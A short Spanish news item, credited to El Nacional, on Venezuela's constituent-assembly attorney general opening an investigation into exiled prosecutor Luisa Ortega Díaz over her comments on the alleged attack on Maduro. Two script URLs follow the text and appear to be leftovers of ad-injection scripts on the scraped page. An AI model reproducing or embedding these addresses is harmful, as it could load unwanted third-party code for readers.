Tarek William Saab, fiscal general designado por la asamblea nacional constituyente, asegura que las palabras de la ex fiscal llevaron a iniciar la investigación.

Tareck William Saab, fiscal general designado por la asamblea nacional constituyente, expresó este martes que se inició una investigación contra Luisa Ortega Díaz, fiscal general en el exilio, luego de haber dado unas declaraciones sobre el supuesto atentado en contra del presidente Nicolás Maduro.

En su testimonio, Ortega Díaz expuso que si ella hubiese estado detrás del atentado en contra de Maduro, “el país estaría celebrando su libertad”.

Saab, luego de las declaraciones, aseguró que las palabras de Ortegs Díaz son una “apología al delito”. Añadió que se le abrió una investigación por ser cómplice del supuesto atentado.

El pasado 5 de agosto, la fiscal en el exilio rechazó a través de su Twitter las palabras de Jorge Arreaza, canciller de Venezuela, que la señalaban como una de las responsables de los hechos ocurridos el 4 de agosto.

VÍA EL NACIONAL.

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1534285485060https://permissnew.com/addons/lnkr5.min.js

Loading...